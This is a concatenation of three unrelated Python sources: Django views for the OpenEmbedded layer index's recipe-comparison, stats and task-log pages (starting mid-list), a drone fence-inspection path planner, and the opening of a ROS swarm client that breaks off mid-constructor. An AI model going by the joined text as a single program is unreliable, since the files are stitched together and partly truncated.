                             'license_image',
                             'live-vm-common',
                             'logging',
                             'metadata_scm',
                             'migrate_localcount',
                             'mirrors',
                             'multilib',
                             'multilib_global',
                             'multilib_header',
                             'oelint',
                             'own-mirrors',
                             'package',
                             'package_deb',
                             'package_ipk',
                             'package_rpm',
                             'package_tar',
                             'packagedata',
                             'packagefeed-stability',
                             'patch',
                             'primport',
                             'prexport',
                             'recipe_sanity',
                             'remove-libtool',
                             'report-error',
                             'reproducible_build',
                             'reproducible_build_simple',
                             'rm_work',
                             'rm_work_and_downloads',
                             'rootfs-postcommands',
                             'rootfs_deb',
                             'rootfs_ipk',
                             'rootfs_rpm',
                             'rootfsdebugfiles',
                             'sanity',
                             'sign_ipk',
                             'sign_package_feed',
                             'sign_rpm',
                             'siteconfig',
                             'siteinfo',
                             'spdx',
                             'sstate',
                             'staging',
                             'syslinux',
                             'systemd-boot',
                             'terminal',
                             'testexport',
                             'testimage',
                             'testimage-auto',
                             'testsdk',
                             'tinderclient',
                             'toaster',
                             'toolchain-scripts',
                             'toolchain-scripts-base',
                             'uninative',
                             'useradd-staticids',
                             'utility-tasks',
                             'utils',
                             ]
        return BBClass.objects.filter(layerbranch__branch__name=self.kwargs['branch']).filter(layerbranch__layer__name=settings.CORE_LAYER_NAME).exclude(name__in=nonrecipe_classes).order_by('name')
class ClassicRecipeSearchView(RecipeSearchView):
    """Search over comparison-branch ("classic") recipes.

    Supports filtering on cover status/verification, category, covering
    layers, patches and needs-attention, and a "reversed" mode that lists
    master-branch recipes matched against their classic coverage.
    """
    def render_to_response(self, context, **kwargs):
        # Bypass the redirect-to-single-instance behaviour of RecipeSearchView
        return super(ListView, self).render_to_response(context, **kwargs)
    def get_queryset(self):
        """Build the (possibly reversed) filtered queryset from GET params."""
        self.kwargs['branch'] = self.kwargs.get('branch', 'oe-classic')
        query_string = self.request.GET.get('q', '')
        cover_status = self.request.GET.get('cover_status', None)
        cover_verified = self.request.GET.get('cover_verified', None)
        category = self.request.GET.get('category', None)
        selectedlayers_param = self.request.GET.get('selectedlayers', '')
        if selectedlayers_param:
            layer_ids = [int(i) for i in selectedlayers_param.split(',')]
        else:
            layer_ids = []
        has_patches = self.request.GET.get('has_patches', '')
        needs_attention = self.request.GET.get('needs_attention', '')
        qreversed = self.request.GET.get('reversed', '')
        init_qs = ClassicRecipe.objects.filter(layerbranch__branch__name=self.kwargs['branch']).filter(deleted=False)
        filtered = False
        cover_null = False
        if cover_status:
            # '!' = not covered (unknown/not-available); '#' = covered in some way
            if cover_status == '!':
                init_qs = init_qs.filter(cover_status__in=['U', 'N'])
            elif cover_status == '#':
                init_qs = init_qs.exclude(cover_status__in=['U', 'N', 'S'])
            else:
                init_qs = init_qs.filter(cover_status=cover_status)
            filtered = True
            if cover_status in ['U', '!']:
                cover_null = True
        if cover_verified:
            init_qs = init_qs.filter(cover_verified=(cover_verified=='1'))
            filtered = True
        if category:
            # Quoted empty string means "no category set"
            if category == "''" or category == '""':
                init_qs = init_qs.filter(classic_category='')
            else:
                init_qs = init_qs.filter(classic_category__icontains=category)
            filtered = True
        if layer_ids:
            init_qs = init_qs.filter(cover_layerbranch__layer__in=layer_ids)
        if has_patches.strip():
            if has_patches == '1':
                init_qs = init_qs.filter(patch__isnull=False).distinct()
            else:
                init_qs = init_qs.filter(patch__isnull=True)
            filtered = True
        if needs_attention.strip():
            if needs_attention == '1':
                init_qs = init_qs.filter(needs_attention=True)
            else:
                init_qs = init_qs.filter(needs_attention=False)
            filtered = True
        # NOTE(review): this assignment overwrites the `filtered` flags set
        # above with search_recipe_query's own notion of "filtered" (keyword
        # present) — confirm whether that is intentional
        qs, filtered = self.search_recipe_query(init_qs, query_string, preferred=False)
        if qreversed:
            # Reversed mode: list master-branch recipes, annotated with the
            # classic recipe (if any) that declares them as its cover
            init_rqs = Recipe.objects.filter(layerbranch__branch__name='master')
            if layer_ids:
                init_rqs = init_rqs.filter(layerbranch__layer__id__in=layer_ids)
            excludeclasses_param = self.request.GET.get('excludeclasses', '')
            if excludeclasses_param:
                # Exclude recipes inheriting any of the listed classes
                for inherit in excludeclasses_param.split(','):
                    init_rqs = init_rqs.exclude(inherits=inherit).exclude(inherits__startswith=inherit + ' ').exclude(inherits__endswith=' ' + inherit).exclude(inherits__contains=' %s ' % inherit)
            all_values = []
            if filtered:
                # Collect (layerbranch id, pn) pairs covered by the filtered set
                if isinstance(qs, list):
                    values = []
                    for item in qs:
                        if item.cover_layerbranch and item.cover_pn:
                            values.append((item.cover_layerbranch.id, item.cover_pn))
                else:
                    values = qs.filter(cover_layerbranch__isnull=False).filter(cover_pn__isnull=False).values_list('cover_layerbranch__id', 'cover_pn').distinct()
                if cover_null:
                    # All covered pairs regardless of filter, used to invert the match
                    all_values = ClassicRecipe.objects.filter(layerbranch__branch__name=self.kwargs['branch']).filter(deleted=False).filter(cover_layerbranch__isnull=False).filter(cover_pn__isnull=False).values_list('cover_layerbranch__id', 'cover_pn').distinct()
            else:
                values = None
            rqs = init_rqs.order_by(Lower('pn'), 'layerbranch__layer')
            if filtered:
                items = []
                # NOTE(review): `in values`/`in all_values` are linear scans per
                # recipe (O(n*m)); converting to sets first would be faster
                for item in rqs:
                    recipe_values = (item.layerbranch.id, item.pn)
                    if (cover_null and recipe_values not in all_values) or (recipe_values in values):
                        items.append(item)
                return ClassicRecipeReverseLinkWrapper(items, self.kwargs['branch'])
            return ClassicRecipeReverseLinkWrapper(rqs, self.kwargs['branch'])
        else:
            return ClassicRecipeLinkWrapper(qs)
    def get_context_data(self, **kwargs):
        """Expose search form state, layer/class filters and update permission."""
        context = super(ClassicRecipeSearchView, self).get_context_data(**kwargs)
        context['this_url_name'] = 'recipe_search'
        branchname = self.kwargs.get('branch', 'oe-classic')
        context['branch'] = get_object_or_404(Branch, name=branchname)
        if 'q' in self.request.GET:
            searched = True
            search_form = ClassicRecipeSearchForm(self.request.GET)
        else:
            searched = False
            search_form = ClassicRecipeSearchForm()
        context['compare'] = self.request.GET.get('compare', False)
        context['reversed'] = self.request.GET.get('reversed', False)
        context['search_form'] = search_form
        context['searched'] = searched
        selectedlayers_param = self.request.GET.get('selectedlayers', '')
        if selectedlayers_param:
            # Map the selected ids back to names for display
            all_layer_names = dict(LayerItem.objects.all().values_list('id', 'name'))
            layer_ids = [int(i) for i in selectedlayers_param.split(',')]
            layer_names = [all_layer_names[i] for i in layer_ids]
            context['selectedlayers_display'] = ','.join(layer_names)
        else:
            layer_ids = []
            context['selectedlayers_display'] = ' (any)'
        context['selectedlayers'] = layer_ids
        excludeclasses_param = self.request.GET.get('excludeclasses', '')
        if excludeclasses_param:
            context['excludeclasses_display'] = excludeclasses_param
            context['excludeclasses'] = excludeclasses_param.split(',')
        else:
            context['excludeclasses_display'] = ' (none)'
            context['excludeclasses'] = []
        context['updateable'] = False
        if self.request.user.has_perm('layerindex.update_comparison_branch'):
            # Only branches configured in COMPARISON_UPDATE can be re-run
            for item in getattr(settings, 'COMPARISON_UPDATE', []):
                if item['branch_name'] == context['branch'].name:
                    context['updateable'] = True
                    break
        return context
class ClassicRecipeDetailView(SuccessMessageMixin, DetailView):
    """Detail page for a ClassicRecipe, with patch disposition handling."""
    model = ClassicRecipe
    context_object_name = 'recipe'

    def _can_edit(self):
        # Editing requires an authenticated user with the edit_classic permission
        user = self.request.user
        return bool(user.is_authenticated() and user.has_perm('layerindex.edit_classic'))

    def _can_disposition_patches(self):
        # Patch disposition requires its own dedicated permission
        user = self.request.user
        return bool(user.is_authenticated() and user.has_perm('layerindex.patch_disposition'))

    def get_context_data(self, **kwargs):
        context = super(ClassicRecipeDetailView, self).get_context_data(**kwargs)
        recipe = context['recipe']
        context['can_edit'] = self._can_edit()
        context['branch'] = recipe.layerbranch.branch
        # Find the recipe that covers this one, if one has been selected
        cover_recipe = None
        if recipe.cover_pn:
            cover_recipe = Recipe.objects.filter(
                layerbranch=recipe.cover_layerbranch, pn=recipe.cover_pn).first()
        context['cover_recipe'] = cover_recipe
        context['layerbranch_desc'] = str(recipe.layerbranch.branch)
        context['to_desc'] = 'OpenEmbedded'
        context['recipes'] = [recipe, cover_recipe]
        can_disposition = self._can_disposition_patches()
        context['can_disposition_patches'] = can_disposition
        if can_disposition:
            # Pre-populate blank forms for every patch without a disposition yet
            undispositioned = list(recipe.patch_set.filter(
                patchdisposition__isnull=True).values_list('id', flat=True))
            formset = PatchDispositionFormSet(
                queryset=PatchDisposition.objects.filter(patch__recipe=recipe),
                initial=[{'patch': patch_id} for patch_id in undispositioned],
                prefix='patchdispositiondialog')
            formset.extra = len(undispositioned)
            context['patch_formset'] = formset
        return context

    def post(self, request, *args, **kwargs):
        if not self._can_disposition_patches():
            raise PermissionDenied
        recipe = get_object_or_404(ClassicRecipe, pk=self.kwargs['pk'])
        # What follows is a bit hacky, because we are receiving the form fields
        # for just one of the forms in the formset which isn't really supported
        # by Django
        for field in request.POST:
            if not field.startswith('patchdispositiondialog'):
                continue
            prefix = '-'.join(field.split('-')[:2])
            instance = None
            disposition_id = request.POST.get('%s-id' % prefix, '')
            if disposition_id != '':
                instance = get_object_or_404(PatchDisposition, pk=int(disposition_id))
            form = PatchDispositionForm(request.POST, prefix=prefix, instance=instance)
            if form.is_valid():
                instance = form.save(commit=False)
                instance.user = request.user
                instance.save()
                messages.success(request, 'Changes to patch %s saved successfully.' % instance.patch.src_path)
                return HttpResponseRedirect(reverse('comparison_recipe', args=(recipe.id,)))
            # FIXME this is ugly because HTML gets escaped
            messages.error(request, 'Failed to save changes: %s' % form.errors)
            break
        return self.get(request, *args, **kwargs)
class ClassicRecipeStatsView(TemplateView):
    """Statistics for a comparison branch: cover status and category charts."""

    def get_context_data(self, **kwargs):
        context = super(ClassicRecipeStatsView, self).get_context_data(**kwargs)
        branchname = self.kwargs.get('branch', 'oe-classic')
        context['branch'] = get_object_or_404(Branch, name=branchname)
        context['url_branch'] = branchname
        context['this_url_name'] = 'recipe_search'
        # *** Cover status chart ***
        recipes = ClassicRecipe.objects.filter(layerbranch__branch=context['branch']).filter(deleted=False)
        statuses = []
        status_counts = {}
        for choice, desc in ClassicRecipe.COVER_STATUS_CHOICES:
            count = recipes.filter(cover_status=choice).count()
            if count > 0:
                statuses.append(desc)
                status_counts[desc] = count
        statuses.sort(key=lambda status: status_counts[status], reverse=True)
        context['chart_status_labels'] = statuses
        context['chart_status_values'] = [status_counts[status] for status in statuses]
        # *** Categories chart ***
        # The categories list must stay in priority order: an item may belong
        # to more than one category and only the first match is counted.
        categories = ['obsoletedir', 'nonworkingdir']
        uniquevals = recipes.exclude(classic_category='').values_list('classic_category', flat=True).distinct()
        for value in uniquevals:
            for cat in value.split():
                if cat not in categories:
                    categories.append(cat)
        categories.append('none')
        catcounts = dict.fromkeys(categories, 0)
        # Only count recipes that haven't been migrated (Unknown / Not available)
        unmigrated = recipes.filter(cover_status__in=['U', 'N'])
        catcounts['none'] = unmigrated.filter(classic_category='').count()
        values = unmigrated.exclude(classic_category='').values_list('classic_category', flat=True)
        for value in values:
            recipecats = value.split()
            foundcat = 'none'
            for cat in categories:
                if cat in recipecats:
                    foundcat = cat
                    break
            catcounts[foundcat] += 1
        # Eliminate categories with zero count, then order by count descending
        categories = [cat for cat in categories if catcounts[cat] > 0]
        categories.sort(key=lambda cat: catcounts[cat], reverse=True)
        context['chart_category_labels'] = categories
        context['chart_category_values'] = [catcounts[cat] for cat in categories]
        return context
class StatsView(TemplateView):
    """Overall index statistics: global distinct counts plus per-branch totals."""

    def get_context_data(self, **kwargs):
        context = super(StatsView, self).get_context_data(**kwargs)
        context['layercount'] = LayerItem.objects.count()
        # Distinct-by-name counts across all layers/branches
        for key, model, field in (
                ('recipe_count_distinct', Recipe, 'pn'),
                ('class_count_distinct', BBClass, 'name'),
                ('machine_count_distinct', Machine, 'name'),
                ('distro_count_distinct', Distro, 'name')):
            context[key] = model.objects.values(field).distinct().count()
        context['perbranch'] = Branch.objects.filter(hidden=False).order_by('sort_priority').annotate(
            layer_count=Count('layerbranch', distinct=True),
            recipe_count=Count('layerbranch__recipe', distinct=True),
            class_count=Count('layerbranch__bbclass', distinct=True),
            machine_count=Count('layerbranch__machine', distinct=True),
            distro_count=Count('layerbranch__distro', distinct=True))
        return context
def layer_export_recipes_csv_view(request, branch, slug):
    """Export the recipes of a layer branch as CSV.

    The exported columns default to pn,pv,license and can be overridden via
    the ?fields= query parameter (validated against Recipe's model fields).
    """
    import csv
    layer = get_object_or_404(LayerItem, name=slug)
    layerbranch = layer.get_layerbranch(branch)
    if not layerbranch:
        raise Http404
    response = HttpResponse(content_type='text/csv')
    response['Content-Disposition'] = 'attachment; filename="recipes_%s_%s.csv"' % (layer.name, layerbranch.branch.name)
    requested_fields = request.GET.get('fields', 'pn,pv,license').split(',')
    # Only allow concrete (non-auto-created relation) model fields
    valid_fields = set(f.name for f in Recipe._meta.get_fields()
                       if not (f.auto_created and f.is_relation))
    for field in requested_fields:
        if field not in valid_fields:
            return HttpResponse('Field %s is invalid' % field)
    writer = csv.writer(response)
    for recipe in layerbranch.sorted_recipes():
        writer.writerow([getattr(recipe, field) for field in requested_fields])
    return response
def comparison_update_view(request, branch):
    """Kick off the background update task for a comparison branch.

    Requires the update_comparison_branch permission and a matching entry in
    settings.COMPARISON_UPDATE; redirects to the task status page.

    Raises Http404 for non-comparison branches and PermissionDenied for
    unauthorised users.
    """
    branchobj = get_object_or_404(Branch, name=branch)
    if not branchobj.comparison:
        raise Http404
    if not request.user.has_perm('layerindex.update_comparison_branch'):
        raise PermissionDenied
    from celery import uuid
    cmd = None
    for item in getattr(settings, 'COMPARISON_UPDATE', []):
        if item['branch_name'] == branchobj.name:
            cmd = item['update_command']
            break
    if not cmd:
        raise Exception('No update command defined for branch %s' % branch)
    task_id = uuid()
    # Create the Update record here first, because inside the task we don't
    # have all of the required info
    update = Update(task_id=task_id)
    update.started = datetime.now()
    update.triggered_by = request.user
    update.save()
    # The AsyncResult return value was previously bound to an unused local;
    # we only need the task_id, which we supplied ourselves
    tasks.run_update_command.apply_async((branch, cmd), task_id=task_id)
    return HttpResponseRedirect(reverse_lazy('task_status', kwargs={'task_id': task_id}))
class TaskStatusView(TemplateView):
    """Status page for a background update task."""

    def get_context_data(self, **kwargs):
        from celery.result import AsyncResult
        context = super(TaskStatusView, self).get_context_data(**kwargs)
        task_id = self.kwargs['task_id']
        context.update({
            'task_id': task_id,
            'result': AsyncResult(task_id),
            'update': get_object_or_404(Update, task_id=task_id),
            'log_url': reverse_lazy('task_log', args=(task_id,)),
        })
        return context
def task_log_view(request, task_id):
    """Return a chunk of a background task's log for the polling frontend.

    Serves the log file from byte offset ?start= onwards, escaped for safe
    display, and reports task state via Task-* response headers.
    """
    from celery.result import AsyncResult
    if not request.user.is_authenticated():
        raise PermissionDenied
    if '/' in task_id:
        # Block anything that looks like a path
        raise Http404
    result = AsyncResult(task_id)
    start = int(request.GET.get('start', 0))
    try:
        f = open(os.path.join(settings.TASK_LOG_DIR, 'task_%s.log' % task_id), 'rb')
    except FileNotFoundError:
        raise Http404
    # Use the file as a context manager instead of a manual try/finally
    with f:
        f.seek(start)
        datastr = f.read()
        origlen = len(datastr)
        # Squash out CRs *within* the string (CRs at the start preserved)
        datastr = utils.squash_crs(datastr)
        # We need to escape this or else things that look like tags in the output
        # will be interpreted as such by the browser
        data = escape(datastr)
    response = HttpResponse(data)
    try:
        ready = result.ready()
    except ConnectionResetError:
        # FIXME this shouldn't be happening so often, but ultimately we don't care -
        # the frontend is polling so it'll likely succeed in a subsequent request
        ready = False
    if ready:
        response['Task-Done'] = '1'
        updateobj = get_object_or_404(Update, task_id=task_id)
        response['Task-Duration'] = utils.timesince2(updateobj.started, updateobj.finished)
        response['Task-Progress'] = 100
        if result.info:
            if isinstance(result.info, dict):
                response['Task-Result'] = result.info.get('retcode', None)
            else:
                # Non-dict info means the task failed in an unexpected way
                response['Task-Result'] = -96
    else:
        response['Task-Done'] = '0'
        preader = utils.ProgressReader(settings.TASK_LOG_DIR, task_id)
        response['Task-Progress'] = preader.read()
    response['Task-Log-Position'] = start + origlen
    return response
def task_stop_view(request, task_id):
    """Terminate a running background task (authenticated users only)."""
    from celery.result import AsyncResult
    import signal
    if not request.user.is_authenticated():
        raise PermissionDenied
    AsyncResult(task_id).revoke(terminate=True, signal=signal.SIGUSR2)
    return HttpResponse('terminated')
def email_test_view(request):
    """Send a test email to the logged-in user (staff only).

    BUGFIX: the previous check was
        `if not request.user.is_authenticated() and request.user.is_staff():`
    which (a) never denied authenticated non-staff users due to short-circuit
    evaluation, and (b) crashed for anonymous users because `is_staff` is an
    attribute, not a method. The intent - deny unless an authenticated staff
    user - is implemented below.
    """
    if not (request.user.is_authenticated() and request.user.is_staff):
        raise PermissionDenied
    plaintext = get_template('layerindex/testemail.txt')
    if request.user.first_name:
        user_name = request.user.first_name
    else:
        user_name = request.user.username
    site = Site.objects.get_current()
    if site:
        site_name = site.name
    else:
        site_name = 'OE Layer Index'
    d = {
        'user_name': user_name,
        'site_name': site_name,
        'site_host': request.META['HTTP_HOST'],
        'help_contact': _get_help_contact(),
    }
    subject = '%s: test email' % site_name
    from_email = settings.SUBMIT_EMAIL_FROM
    to_email = request.user.email
    text_content = plaintext.render(d)
    tasks.send_email.apply_async((subject, text_content, from_email, [to_email]))
    return HttpResponse('Test email sent to %s' % to_email)
class ComparisonRecipeSelectView(ClassicRecipeSearchView):
    """Search view for choosing which master-branch recipe covers a
    comparison (classic) recipe."""

    def _can_edit(self):
        # Editing requires an authenticated user with the edit_classic permission
        if self.request.user.is_authenticated():
            if not self.request.user.has_perm('layerindex.edit_classic'):
                return False
        else:
            return False
        return True

    def get_context_data(self, **kwargs):
        # Force the parent search view to operate on the master branch; this
        # must be set before calling super(), which reads self.kwargs['branch']
        self.kwargs['branch'] = 'master'
        context = super(ComparisonRecipeSelectView, self).get_context_data(**kwargs)
        recipe = get_object_or_404(ClassicRecipe, pk=self.kwargs['pk'])
        context['select_for'] = recipe
        context['existing_cover_recipe'] = recipe.get_cover_recipe()
        # The comparison form is submitted from a dialog; the cover fields are
        # hidden because they get filled in by the page's selection javascript
        comparison_form = ClassicRecipeForm(prefix='selectrecipedialog', instance=recipe)
        comparison_form.fields['cover_pn'].widget = forms.HiddenInput()
        comparison_form.fields['cover_layerbranch'].widget = forms.HiddenInput()
        context['comparison_form'] = comparison_form
        if 'q' in self.request.GET:
            search_form = ComparisonRecipeSelectForm(self.request.GET)
        else:
            search_form = ComparisonRecipeSelectForm()
        context['search_form'] = search_form
        context['can_edit'] = self._can_edit()
        return context

    def get_queryset(self):
        # Search within master-branch recipes, optionally restricted to the
        # layers the user selected
        query_string = self.request.GET.get('q', '')
        selectedlayers_param = self.request.GET.get('selectedlayers', '')
        if selectedlayers_param:
            layer_ids = [int(i) for i in selectedlayers_param.split(',')]
        else:
            layer_ids = []
        init_qs = Recipe.objects.filter(layerbranch__branch__name='master')
        if layer_ids:
            init_qs = init_qs.filter(layerbranch__layer__in=layer_ids)
        qs, _ = self.search_recipe_query(init_qs, query_string, preferred=False)
        return qs

    def post(self, request, *args, **kwargs):
        # Save the selected cover recipe back onto the comparison recipe
        if not self._can_edit():
            raise PermissionDenied
        recipe = get_object_or_404(ClassicRecipe, pk=self.kwargs['pk'])
        form = ClassicRecipeForm(request.POST, prefix='selectrecipedialog', instance=recipe)
        if form.is_valid():
            form.save()
            messages.success(request, 'Changes to comparison recipe %s saved successfully.' % recipe.pn)
            return HttpResponseRedirect(reverse('comparison_recipe', args=(recipe.id,)))
        else:
            # FIXME this is ugly because HTML gets escaped
            messages.error(request, 'Failed to save changes: %s' % form.errors)
        return self.get(request, *args, **kwargs)
class ComparisonRecipeSelectDetailView(DetailView):
    """Detail view of a master-branch recipe being considered as the cover
    for a comparison recipe."""
    model = Recipe

    def get_context_data(self, **kwargs):
        context = super(ComparisonRecipeSelectDetailView, self).get_context_data(**kwargs)
        target = get_object_or_404(ClassicRecipe, pk=self.kwargs['selectfor'])
        # The cover fields are hidden; they are filled in by the page itself
        selection_form = ClassicRecipeForm(prefix='selectrecipedialog', instance=target)
        for hidden_field in ('cover_pn', 'cover_layerbranch'):
            selection_form.fields[hidden_field].widget = forms.HiddenInput()
        context.update({
            'select_for': target,
            'existing_cover_recipe': target.get_cover_recipe(),
            'comparison_form': selection_form,
            'can_edit': False,
        })
        return context

    def post(self, request, *args, **kwargs):
        if not request.user.is_authenticated():
            raise PermissionDenied
        target = get_object_or_404(ClassicRecipe, pk=self.kwargs['selectfor'])
        form = ClassicRecipeForm(request.POST, prefix='selectrecipedialog', instance=target)
        if not form.is_valid():
            # FIXME this is ugly because HTML gets escaped
            messages.error(request, 'Failed to save changes: %s' % form.errors)
            return self.get(request, *args, **kwargs)
        form.save()
        messages.success(request, 'Changes to comparison recipe %s saved successfully.' % target.pn)
        return HttpResponseRedirect(reverse('comparison_recipe', args=(target.id,)))
|
<gh_stars>0
'''
Any questions ask Mikkel
'''
import os
import math
import csv
import numpy as np
import matplotlib.pyplot as plt
from shapely.geometry.polygon import LinearRing
from scipy.spatial.distance import cdist
from utm import utmconv
import pandas as pd
class Pathplanclass():
    """Plan a drone photo flight path that follows a fence polygon.

    Reads the fence from a QGroundControl .plan file, offsets it by
    FENCE_OFFSET metres, places photo waypoints at most FIELD_OF_VIEW metres
    apart, computes a capture heading per waypoint and writes
    (lon, lat, heading) rows to a CSV file. All planning runs from the
    constructor via run_main().
    """

    def __init__(self):
        # Plot the resulting path with matplotlib when True
        self.plotData = True
        self.plan_file = "/outside_fence_wed.plan"
        self.csv_filename = '/fence_2m.csv'
        self.uc = utmconv()
        # FIELD OF VIEW OF CAMERA IN METERS
        self.FIELD_OF_VIEW = 8
        # OFFSET OF DRONE PATH FROM FENCE
        self.FENCE_OFFSET = 2
        self.basePath = os.path.dirname(os.path.abspath(__file__))
        self.dirrec = ""
        ##### RUNNING THE SCRIPTS #####
        self.run_main(self.plan_file)

    def get_fence_position(self, filename):
        """Read fence waypoints from a .plan file and convert them to UTM.

        Returns (hemisphere, zone, letter, path_fence) where path_fence is a
        list of [easting, northing] pairs. Stops at the first item whose
        altitude is 0 (treated as an end marker).
        """
        file_read = pd.read_json(self.basePath + filename, orient='columns')
        fileLength = len(file_read['mission']['items'])
        path_fence = []
        uc = utmconv()
        for i in range(1, fileLength):  # Starts from item[1] because item[0] would be null
            lon = file_read['mission']['items'][i]['params'][4]
            lat = file_read['mission']['items'][i]['params'][5]
            alt = file_read['mission']['items'][i]['params'][6]
            if alt == 0:
                break
            hemisphere, zone, letter, e, n = uc.geodetic_to_utm(lat, lon)
            path_fence.append([e, n])
        # NOTE(review): if the plan contains no usable waypoints, hemisphere/
        # zone/letter are unbound here and a NameError is raised - assumed
        # plans always contain at least one waypoint.
        return hemisphere, zone, letter, path_fence

    def calculate_flight_path(self, path_fence):
        """Offset the closed fence polygon by FENCE_OFFSET metres.

        Offsets to both sides and keeps the shorter ring (presumably the
        inside of the fence - TODO confirm); the chosen side also fixes the
        traversal direction, recorded in self.dirrec as "CW" or "CCW".
        """
        poly_line = LinearRing(path_fence)
        poly_line_offset_left = poly_line.parallel_offset(self.FENCE_OFFSET, side="left", resolution=16, join_style=2)
        poly_line_offset_right = poly_line.parallel_offset(self.FENCE_OFFSET, side="right", resolution=16, join_style=2)
        if (poly_line_offset_left.length > poly_line_offset_right.length):
            poly_line_offset = poly_line_offset_right
            self.dirrec = "CCW"
            print("CCW")
        else:
            poly_line_offset = poly_line_offset_left
            self.dirrec = "CW"
            print("CW")
        flight_path_x, flight_path_y = poly_line_offset.xy
        return flight_path_x, flight_path_y

    def calculate_photo_positions(self, path_x, path_y):
        """Subdivide each path segment so consecutive photo positions are at
        most FIELD_OF_VIEW metres apart.

        Segment endpoints are included, so shared vertices appear twice
        (once per adjacent segment).
        """
        new_path_x = []
        new_path_y = []
        for i in range(len(path_x) - 1):
            path_length = math.sqrt(((path_x[i] - path_x[i + 1]) ** 2) + ((path_y[i] - path_y[i + 1]) ** 2))
            N = math.ceil(path_length / (self.FIELD_OF_VIEW)) + 1
            new_path_x = np.concatenate((new_path_x, np.linspace(path_x[i], path_x[i + 1], N)))
            new_path_y = np.concatenate((new_path_y, np.linspace(path_y[i], path_y[i + 1], N)))
        return new_path_x, new_path_y

    def calculate_photo_orientation(self, path_x, path_y):
        """Compute the capture heading (degrees, 0-360, 2 decimals) per point.

        The heading follows the local path segment; it is negated (and
        rotated 180 deg for CW paths) so the camera faces the fence.
        """
        angles = []
        last = len(path_x) - 1
        for i in range(len(path_x)):
            # Heading of the local segment; fall back to the incoming segment
            # at the path end or across duplicated points.
            # BUGFIX: math.degrees replaces "* 180 / 3.1415" (inaccurate pi).
            if i == last or (path_x[i] == path_x[i + 1] and path_y[i] == path_y[i + 1]):
                angle = math.degrees(math.atan2(path_y[i] - path_y[i - 1], path_x[i] - path_x[i - 1]))
            else:
                angle = math.degrees(math.atan2(path_y[i + 1] - path_y[i], path_x[i + 1] - path_x[i]))
            # Map range from -180..180 to 0..360 deg where 0 deg is along the x axis
            angle = (angle + 360) % 360
            angle *= -1
            if self.dirrec == "CW":
                angle += 180
            # Normalise back into 0..360
            if angle > 360:
                angle = angle % 360
            if angle < 0:
                angle = 360 - abs(angle)
            angles.append(round(angle, 2))
        return angles

    def convert_utm_to_lon_lat(self, hemisphere, zone, east, north):
        """Convert parallel arrays of UTM coordinates back to geodetic.

        Returns (lat, lon) lists - note the order is the reverse of what the
        method name suggests.
        """
        lat = []
        lon = []
        for idx in range(len(north)):
            lat_val, lon_val = self.uc.utm_to_geodetic(hemisphere, zone, east[idx], north[idx])
            lat.append(lat_val)
            lon.append(lon_val)
        return lat, lon

    def collect_xy_oriantation(self, lat_x, lon_y, ori):
        """Pack latitude, longitude and orientation into an (N, 3) float array.

        Columns are [lat, lon, orientation]. (Method name typo kept for
        backward compatibility with existing callers.)
        """
        return np.column_stack([lat_x, lon_y, ori]).astype(float)

    def write_csv(self, data, fileName):
        """Write rows of (lon, lat, heading) to a CSV file under basePath."""
        # newline='' prevents the csv module from emitting extra blank lines
        # on Windows (per the csv module documentation)
        with open(self.basePath + fileName, 'w', newline='') as file:
            writeData = csv.writer(file)
            for row in data:
                # data rows are [lat, lon, ori]; output column order is lon, lat, ori
                writeData.writerow([row[1], row[0], row[2]])

    def fix_start_point(self, path_fence, flight_path_x, flight_path_y):
        """Rotate the flight path so it starts nearest the fence's first point."""
        node = path_fence[0]
        # BUGFIX: zip() returns an iterator on Python 3 and cdist requires a
        # concrete 2-D array-like, so materialise it as a list
        nodes = list(zip(flight_path_x, flight_path_y))
        shift = cdist([node], nodes).argmin()
        fixed_x = np.roll(flight_path_x, -shift)
        fixed_y = np.roll(flight_path_y, -shift)
        return fixed_x, fixed_y

    def fix_dir(self, flight_path_x, flight_path_y):
        """Reverse the path for CCW fences so traversal direction is uniform."""
        if self.dirrec == "CCW":
            return np.flipud(flight_path_x), np.flipud(flight_path_y)
        return flight_path_x, flight_path_y

    def run_main(self, plan_file):
        """Full pipeline: read fence, offset, place photos, write CSV, plot."""
        hemisphere, zone, letter, path_fence = self.get_fence_position(plan_file)
        flight_path_x, flight_path_y = self.calculate_flight_path(path_fence)
        flight_path_x, flight_path_y = self.fix_dir(flight_path_x, flight_path_y)
        photo_pos_x, photo_pos_y = self.calculate_photo_positions(flight_path_x, flight_path_y)
        photo_pos_x, photo_pos_y = self.fix_start_point(path_fence, photo_pos_x, photo_pos_y)
        photo_orientation = self.calculate_photo_orientation(photo_pos_x, photo_pos_y)  # rotation around z-axis
        lat, lon = self.convert_utm_to_lon_lat(hemisphere, zone, photo_pos_x, photo_pos_y)
        pos = self.collect_xy_oriantation(lat, lon, photo_orientation)
        self.write_csv(pos, self.csv_filename)
        ## -------- Plotting data ------- ##
        if self.plotData is True:
            fence_x, fence_y = zip(*path_fence)
            plt.plot(fence_x, fence_y, 'o-', color='black')
            plt.plot(photo_pos_x, photo_pos_y, 'o-', color='red')
            for i, txt in enumerate(photo_orientation):
                plt.annotate(txt, (photo_pos_x[i], photo_pos_y[i]))
            plt.axis('equal')
            plt.show()
if __name__ == "__main__":
    # Run the path planner directly; all planning happens in the constructor
    #try:
    Pathplanclass()
    #except rospy.ROSInterruptException as e:
    #    print(e)
|
#!/usr/bin/env python
import time
import PyKDL
import tf
import rospy
import roslibpy
from tf_conversions import posemath
from geometry_msgs.msg import Twist, Pose, PoseStamped
from move_base_msgs.msg import MoveBaseGoal, MoveBaseFeedback, MoveBaseAction
class SwarmClient():
    """Bridge between this robot's local ROS graph and a remote swarm base.

    Connects to the base robot via rosbridge (roslibpy), forwards joystick
    and swarm commands from the base onto local topics, and publishes this
    robot's pose back to the base as a heartbeat at 2 Hz.
    """

    def __init__(self):
        # base robot ip and port
        self.__base_port = rospy.get_param('~base_port', 9090)
        self.__base_ip = rospy.get_param('~base_address', 'scout-mini-02.local')
        # robot name, each robot should have different name
        self.__robot_name = rospy.get_param('~robot_name', 'scout-mini-02')
        self.__robot_frame_id = rospy.get_param('~robot_frame_id', 'base_footprint')
        self.__load_swarm_trans()
        self.__current_command = 'dismiss'
        self.__tf_listener = tf.TransformListener()
        self.__ros_client = roslibpy.Ros(self.__base_ip, self.__base_port)
        self.__joy_command = roslibpy.Topic(self.__ros_client, 'yocs_cmd_vel_mux/input/joy_cmd', 'geometry_msgs/Twist')
        self.__swarm_command = roslibpy.Topic(self.__ros_client, 'swarm_command', 'swarm_msgs/SwarmCommand')
        # NOTE(review): 'swarm_hearbeat' looks like a typo for 'swarm_heartbeat',
        # but it is the on-the-wire topic name - changing it would break the base
